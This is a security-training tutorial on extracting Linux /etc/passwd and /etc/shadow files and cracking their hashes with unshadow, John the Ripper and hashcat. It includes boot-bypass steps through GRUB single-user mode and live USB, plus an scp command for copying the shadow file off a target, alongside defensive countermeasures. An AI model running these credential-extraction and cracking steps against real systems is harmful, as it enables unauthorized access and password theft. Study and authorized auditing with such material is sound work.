Linux Password Cracking (Shadow Files)
Extracting and cracking Unix/Linux authentication credentials
What You'll Discover
🎯 Why This Matters
Linux and Unix systems power the majority of web servers, cloud infrastructure, and critical enterprise systems. Understanding how to extract and crack Linux passwords is essential for penetration testing, security audits, and incident response. Unlike Windows, Linux uses strong password hashing by default (SHA-512, yescrypt, Blowfish), but weak passwords remain vulnerable despite robust cryptography. Security professionals need Linux password cracking skills to assess password policies on servers, evaluate the impact of physical access attacks, and demonstrate that strong hashing alone doesn't guarantee security without proper password requirements.
🔍 What You'll Learn
You'll master Linux credential extraction from /etc/shadow, understand the format and security of SHA-512, SHA-256, MD5, and yescrypt password hashes, learn to use unshadow to combine /etc/passwd and /etc/shadow files, and develop skills in cracking Linux passwords with John the Ripper and hashcat. These techniques are critical for Linux server penetration testing, assessing password policies on production systems, recovering access to locked accounts, and understanding how attackers pivot through Linux infrastructure using compromised credentials.
🚀 Your First Win
In the next 15 minutes, you'll understand how Linux stores passwords in /etc/shadow, learn to identify different hash types from their format, and know exactly how security professionals crack Linux credentials during authorized assessments.
🔧 Try This Right Now
Let's examine how Linux password hashes are stored in the /etc/shadow file:
# View shadow file (requires root)
sudo cat /etc/shadow
# Format: username:hash:lastchange:min:max:warn:inactive:expire:reserved
# Example entry:
# hdna:$6$rounds=5000$salt$hash:19000:0:99999:7:::
# Hash format breakdown:
# $6$ = SHA-512 (most common modern Linux)
# $5$ = SHA-256
# $1$ = MD5 (legacy, weak)
# $2a$/$2y$ = Blowfish/bcrypt (strong)
# $y$ = yescrypt (newest, very strong)
# View your own user info in passwd
cat /etc/passwd | grep $USER
# Passwd format: username:x:UID:GID:comment:home:shell
# The "x" means password is in /etc/shadow
# For pentesting, you'll extract both files:
# /etc/passwd - contains usernames and UIDs
# /etc/shadow - contains password hashes
# Example shadow hash breakdown:
# $6$rounds=5000$saltsaltsa$verylonghashstringhere
# $6$ = Hash algorithm (SHA-512)
# rounds=5000 = Iteration count (default 5000)
# saltsaltsa = Random salt (prevents rainbow tables)
# verylonghash = The actual password hashYou'll see: Linux password hashes use strong algorithms like SHA-512 with salting and thousands of iterations (rounds), making them much harder to crack than NTLM. The salt ensures identical passwords produce different hashes across systems. Understanding this format is fundamental to Linux password attacks.
Skills You'll Master
✅ Core Understanding
- Linux password storage in /etc/shadow
- Hash format identification (SHA-512, SHA-256, MD5, yescrypt)
- Salt and iteration count impact on cracking
- Combining passwd and shadow with unshadow
🔍 Expert Skills
- Advanced John the Ripper rule-based attacks
- GPU-accelerated Linux hash cracking
- Single-user mode and rescue boot techniques
- sudo password attacks and privilege escalation
Understanding Linux Authentication
Linux password security has evolved significantly from early Unix systems. Modern Linux distributions use SHA-512 crypt by default, applying 5,000 rounds of SHA-512 hashing with a random salt. The /etc/shadow file stores these hashes with restricted permissions (readable only by root), separating password data from the publicly readable /etc/passwd file. This architecture provides strong security - SHA-512 with salting and iteration counts makes rainbow table attacks impossible and dramatically slows brute force attempts. However, the fundamental truth remains: weak passwords crack regardless of hash strength. An 8-character password cracks in days or weeks; complex passwords under 12 characters remain vulnerable to determined attackers.
🔐 Linux Password Hashing
Password → SHA-512 Crypt (5000 rounds) → Salted Hash
Stored in: /etc/shadow (root only)
Strong algorithm + salt + iterations = slow cracking, but weak passwords still vulnerable
The Weakness
While Linux hashing is strong, physical access or root compromise enables shadow file extraction. Weak passwords remain vulnerable despite robust cryptography.
The Attack
Extract /etc/passwd and /etc/shadow files via root access, physical access, or backup files, combine with unshadow, then crack with John the Ripper or hashcat.
The Result
System compromise, privilege escalation to root, lateral movement through SSH key access, and persistent backdoor installation.
The Linux shadow file documentation details the password storage format, but understanding the security implications requires deeper analysis. SHA-512 crypt processes each password guess through 5,000 iterations of SHA-512, dramatically slowing cracking compared to NTLM (which uses single MD4). Modern GPUs crack NTLM at 100 billion attempts/second but only achieve 200,000-500,000 SHA-512 attempts/second - a 200,000x difference. This computational cost protects against brute force but can't compensate for dictionary-based passwords or predictable patterns.
Newer distributions are transitioning to yescrypt, which provides even stronger protection through memory-hard key derivation. The yescrypt algorithm requires significant memory allocation during hashing, making GPU and ASIC acceleration less effective. However, adoption remains limited, and most Linux systems still use SHA-512 crypt. Organizations should understand that while Linux password hashing is significantly stronger than Windows NTLM, the ultimate security depends on password complexity and length. A 16+ character passphrase on Linux becomes practically uncrackable with current technology, while an 8-character password on the same system may crack within days.
Tools and Techniques
🔨 unshadow: Combining Password Files
The unshadow utility (part of John the Ripper) combines /etc/passwd and /etc/shadow into a single file suitable for password cracking. This step is essential because John needs both username information (from passwd) and password hashes (from shadow) to perform cracking operations.
# Extract passwd and shadow files (requires root)
# During pentest after gaining root access:
sudo cp /etc/passwd passwd.txt
sudo cp /etc/shadow shadow.txt
# Or extract from physical access/live boot:
# Boot from USB → mount target filesystem
sudo mount /dev/sda1 /mnt
sudo cp /mnt/etc/passwd passwd.txt
sudo cp /mnt/etc/shadow shadow.txt
# Combine files with unshadow
unshadow passwd.txt shadow.txt > unshadowed.txt
# Examine the combined output
cat unshadowed.txt
# Format: username:hash:UID:GID:comment:home:shell
# Example:
# hdna:$6$rounds=5000$salt$hash:1000:1000:HackerDNA User:/home/hdna:/bin/bash
# Now this file is ready for John the Ripper or hashcat
# The tool can see both usernames and their corresponding hashes
# Target specific users (extract only certain accounts)
grep -E "^(root|hdna|admin)" unshadowed.txt > targets.txtUnshadow performs a simple but critical function - it matches username entries from /etc/passwd with their corresponding password hashes from /etc/shadow. Without this step, John the Ripper can't associate usernames with hashes, limiting attack effectiveness. During penetration tests, prioritize cracking root and sudo-capable accounts, as these provide immediate privilege escalation.
⚡ John the Ripper: Linux Password Specialist
John the Ripper excels at Linux password cracking with automatic format detection, optimized SHA-512 implementations, and powerful rule engines. It's the standard tool for Linux/Unix password auditing and provides excellent performance on CPU-based systems.
# Basic dictionary attack
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
# John automatically detects hash type (SHA-512, SHA-256, MD5, etc.)
# No need to specify format for standard Linux hashes
# Rule-based attack with mutations
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
# Show cracked passwords
john --show unshadowed.txt
# Format shows: username:password:UID:GID:...
# Example: hdna:password123:1000:1000:...
# Incremental mode (brute force)
# Very slow for SHA-512 but effective for short passwords
john --incremental unshadowed.txt
# Target specific users
john --users=root,hdna --wordlist=rockyou.txt unshadowed.txt
# Custom rules for Linux servers
# Common patterns: username-based, server names, admin passwords
echo '[List.Rules:LinuxRules]' > linux.conf
echo 'cAz"[0-9][0-9][0-9][0-9]"' >> linux.conf # Capitalize + year
echo 'cAz"[!@#]"' >> linux.conf # Capitalize + special char
echo 'l Az"[0-9]"' >> linux.conf # Lowercase + append digit
john --rules=LinuxRules --wordlist=server_terms.txt unshadowed.txt
# Session management for long attacks
john --session=hdna_linux unshadowed.txt
john --restore=hdna_linux
# Specify format explicitly (if needed)
john --format=sha512crypt unshadowed.txtJohn the Ripper's automatic format detection handles SHA-512, SHA-256, MD5, Blowfish, and yescrypt hashes without manual configuration. The official John the Ripper documentation provides comprehensive guides for advanced usage. For Linux password audits, rule-based attacks prove highly effective as users often base passwords on usernames, server names, or organizational terms.
🚀 hashcat: GPU-Accelerated Linux Cracking
Hashcat provides GPU acceleration for Linux password cracking, dramatically improving performance compared to CPU-based cracking. While SHA-512 is computationally expensive, modern GPUs still provide significant speed advantages over CPUs.
# Hashcat modes for Linux:
# 1800: SHA-512 crypt (sha512crypt $6$) - most common
# 7400: SHA-256 crypt (sha256crypt $5$)
# 500: MD5 crypt (md5crypt $1$) - legacy
# 3200: Blowfish/bcrypt ($2a$, $2y$)
# 7900: SHA-512 APR (Apache htpasswd)
# Extract hashes for hashcat (skip unshadow step)
# Just extract the hash field from shadow file
sudo cat /etc/shadow | grep -v "^[#\*!]" | cut -d: -f2 > hashes.txt
# Dictionary attack on SHA-512 hashes
hashcat -m 1800 -a 0 hashes.txt rockyou.txt
# Rule-based attack with password mutations
hashcat -m 1800 -a 0 hashes.txt rockyou.txt -r rules/best64.rule
# Mask attack for known patterns
# Example: 8-10 characters, starts with capital
hashcat -m 1800 -a 3 hashes.txt '?u?l?l?l?l?l?l?d?d'
# Hybrid attack: wordlist + mask
hashcat -m 1800 -a 6 hashes.txt rockyou.txt '?d?d?d?d'
# Show cracked passwords
hashcat -m 1800 hashes.txt --show
# Benchmark SHA-512 cracking speed
hashcat -m 1800 -b
# Typical speeds:
# RTX 3090: 400-500k H/s (400,000 hashes/second)
# RTX 4090: 800k-1M H/s
# CPU (8-core): 5k-10k H/s
# Compare to NTLM (mode 1000):
# Same GPU: 100+ billion H/s
# SHA-512 is 200,000x slower to crack!
# Workload tuning for maximum performance
hashcat -m 1800 -a 0 hashes.txt rockyou.txt -w 3
# For legacy MD5 crypt (much faster)
hashcat -m 500 -a 0 hashes.txt rockyou.txtGPU acceleration provides substantial performance improvements for SHA-512 cracking, but the algorithm remains computationally expensive. A high-end GPU achieving 1 million SHA-512/sec would need approximately 3 years to exhaust all 8-character passwords using full character space. This stark reality underscores why strong hashing matters - it makes brute force attacks impractical even with powerful hardware.
🎯 Physical Access and Rescue Mode Techniques
Physical access to Linux systems enables password file extraction without network authentication. Security assessors use these techniques to demonstrate physical security vulnerabilities and test password strength offline.
# Method 1: Boot from USB/Live CD
# 1. Boot system from USB stick (Kali Linux, Ubuntu Live)
# 2. Mount target filesystem
sudo mkdir /mnt/target
sudo mount /dev/sda1 /mnt/target
# 3. Extract password files
sudo cp /mnt/target/etc/passwd passwd.txt
sudo cp /mnt/target/etc/shadow shadow.txt
# 4. Unmount and reboot
sudo umount /mnt/target
# Method 2: Single-user mode (if GRUB not password protected)
# 1. At GRUB menu, press 'e' to edit boot parameters
# 2. Find line starting with 'linux' or 'linux16'
# 3. Add 'single' or 'init=/bin/bash' to end of line
# 4. Press Ctrl+X or F10 to boot
# 5. System boots to root shell without password
# 6. Remount filesystem read-write:
mount -o remount,rw /
# 7. Extract password files or reset passwords directly
cp /etc/passwd /media/usb/
cp /etc/shadow /media/usb/
# Method 3: Rescue mode via kernel parameters
# Similar to single-user, but add: rd.break
# This drops to emergency shell before mounting root
# Method 4: Extract from backups
# Check common backup locations:
ls /var/backups/ # Ubuntu/Debian store shadow backups here
ls /backup/
ls /root/backup/
# Sometimes find unencrypted backups with password files
tar -tzf backup.tar.gz | grep shadowPhysical access attacks demonstrate why organizations need full-disk encryption (LUKS, dm-crypt) and GRUB password protection. Without these controls, an attacker with physical access can extract password files in minutes. Security assessments should test both password strength and physical security controls to provide comprehensive risk evaluation.
Defensive Countermeasures
🛡️ Strong Password Policies for Linux
Linux password policies should account for SHA-512's computational cost while maintaining practical usability. The Linux password policy configuration guide details implementation, but organizations should exceed minimum requirements for privileged accounts.
- Minimum 12 characters: Balanced security for regular accounts
- Root/sudo accounts 16+ characters: Privileged accounts need maximum protection
- Enforce via PAM: Use pam_pwquality module for complexity requirements
- Increase SHA-512 rounds: Default 5,000 rounds can be increased to 100,000+ in /etc/login.defs
🔐 Physical Security and Boot Protection
Physical access undermines password security regardless of hash strength. Organizations must implement physical security controls and boot-level protections to prevent unauthorized password extraction.
- Full-disk encryption: LUKS encryption protects against offline password extraction
- GRUB password protection: Prevent boot parameter modification and single-user mode
- BIOS/UEFI passwords: Prevent booting from external media
- Secure Boot: Verify boot components haven't been tampered with
⚡ SSH Key Authentication
SSH key-based authentication eliminates password transmission over the network and provides stronger security than password authentication. Organizations should transition to key-based authentication for remote access.
- Disable password authentication: Set "PasswordAuthentication no" in /etc/ssh/sshd_config
- Require SSH keys: ED25519 or RSA 4096-bit keys for all remote access
- Certificate-based authentication: SSH certificates for large deployments
- Two-factor authentication: PAM modules like Google Authenticator for additional protection
🔍 Audit Logging and Monitoring
Comprehensive logging detects password attack attempts and unauthorized access. Linux provides extensive logging capabilities through syslog, auditd, and authentication logs that security teams should monitor continuously.
- Monitor /var/log/auth.log: All authentication attempts logged with timestamps
- Auditd for shadow access: Alert on /etc/shadow file access attempts
- Failed login monitoring: Use fail2ban to block brute force attempts
- Sudo command logging: Track all privileged command execution
FAQ
Linux Password Cracking Basics
How do I extract password hashes from a Linux system?
Extract Linux password hashes by copying /etc/passwd and /etc/shadow files (requires root access). Use "sudo cp /etc/shadow shadow.txt" on a live system, or boot from USB and mount the target filesystem to access files without authentication. Combine the files with unshadow: "unshadow passwd.txt shadow.txt > unshadowed.txt". The resulting file contains usernames and their corresponding SHA-512, SHA-256, or MD5 hashes ready for John the Ripper or hashcat. For hashcat, extract just the hash field: "cut -d: -f2 /etc/shadow > hashes.txt".
What's the difference between /etc/passwd and /etc/shadow?
/etc/passwd stores user account information (username, UID, GID, home directory, shell) and is world-readable for system functionality. /etc/shadow stores actual password hashes and is readable only by root for security. Historically, hashes were in passwd, but this exposed them to all users. Modern Linux separates sensitive password data into shadow with restricted permissions. The "x" in passwd's password field indicates the actual hash is in shadow. Both files are needed for cracking - passwd provides usernames, shadow provides hashes.
How can I identify different Linux hash types?
Identify Linux hash types by the prefix: $6$ indicates SHA-512 crypt (most common modern Linux), $5$ indicates SHA-256 crypt, $1$ indicates MD5 crypt (legacy, weak), $2a$ or $2y$ indicates Blowfish/bcrypt, and $y$ indicates yescrypt (newest). The number after the dollar sign specifies the algorithm. SHA-512 hashes also show rounds parameter like "$6$rounds=5000$" indicating iteration count. John the Ripper auto-detects these formats, but hashcat requires specifying mode (1800 for SHA-512, 7400 for SHA-256, 500 for MD5).
Technical Implementation
Why is Linux password cracking slower than Windows NTLM?
Linux SHA-512 crypt uses 5,000 rounds of SHA-512 hashing with random salts, making it dramatically slower than Windows NTLM (single MD4 hash, no salt). A GPU that cracks NTLM at 100 billion attempts/second only achieves 400,000-500,000 SHA-512 attempts/second - a 200,000x difference. This computational cost protects against brute force attacks. However, dictionary attacks against weak passwords remain effective regardless of iteration counts. The key derivation function slows down every password guess equally, making strong passwords practically uncrackable but offering limited protection for weak passwords.
How long does it take to crack different Linux password types?
Cracking time depends on password strength and hash type. Legacy MD5 crypt ($1$) with weak passwords cracks in hours to days. SHA-512 with 8-character passwords may take weeks to months depending on complexity. 12-character passwords with high entropy take years to crack via brute force. 16+ character passphrases become practically uncrackable with current technology - requiring centuries even with powerful GPU clusters. However, dictionary attacks succeed much faster - weak passwords from rockyou.txt crack in minutes to hours regardless of SHA-512's iterations. Strong hashing buys time but can't compensate for poor password choices.
Practical Applications
Can I crack Linux passwords without physical access?
Yes, if you gain root access through other vulnerabilities (privilege escalation, web application compromise, SSH with stolen keys). Once root, extract /etc/shadow and crack offline. Remote extraction via compromised credentials: "scp root@<target>:/etc/shadow ." Network attacks like password spraying against SSH can also succeed against weak passwords, though many systems implement rate limiting. The most common scenario in penetration testing is escalating from limited user access to root, then extracting shadow for password auditing to demonstrate weak credential risks.
What password patterns work best for Linux server cracking?
Linux servers often use predictable patterns: hostname+numbers (server01, web2024), username-based passwords (username, username123), service identifiers (apache, mysql, postgres), company/project names, and common admin passwords (admin, password, toor). Create custom wordlists from reconnaissance - extract hostnames from DNS, gather company terms from websites, collect service names from port scans. Use John the Ripper's rules to apply common mutations (capitalize, append years, add special characters). Combination attacks joining server-specific terms with common passwords prove highly effective.
How do I increase SHA-512 rounds for better security?
Increase SHA-512 rounds by editing /etc/login.defs and adding/modifying: "SHA_CRYPT_MIN_ROUNDS 10000" and "SHA_CRYPT_MAX_ROUNDS 10000" (or higher values like 50,000-100,000). This applies to new passwords created after the change. Existing passwords retain their original round counts until changed. Higher rounds dramatically slow cracking - 100,000 rounds is 20x slower than default 5,000. However, this also impacts login performance. Balance security (100,000+ rounds) against user experience. For high-security systems, consider migrating to yescrypt which provides better protection with memory-hard algorithms.
What's single-user mode and why is it a security risk?
Single-user mode boots Linux directly to a root shell without password authentication, intended for emergency system maintenance. Attackers with physical access modify GRUB boot parameters (add "single" or "init=/bin/bash") to gain root access instantly, bypassing all password security. Once in single-user mode, attackers can extract /etc/shadow, reset passwords, install backdoors, or steal data. Defend against this by setting GRUB passwords (prevents boot parameter modification), enabling full-disk encryption (LUKS - requires password before boot), and implementing BIOS/UEFI passwords. Without these controls, physical access equals root access.
🎯 You've Got Linux Password Cracking Down!
You now understand Linux password storage in /etc/shadow, can extract and combine password files with unshadow, and know how to crack SHA-512, SHA-256, and legacy MD5 hashes using John the Ripper and hashcat. These skills are essential for Linux server penetration testing, password policy auditing, and understanding how the strong hashing in Linux systems compares to Windows NTLM authentication.
Ready to master advanced password cracking techniques and optimization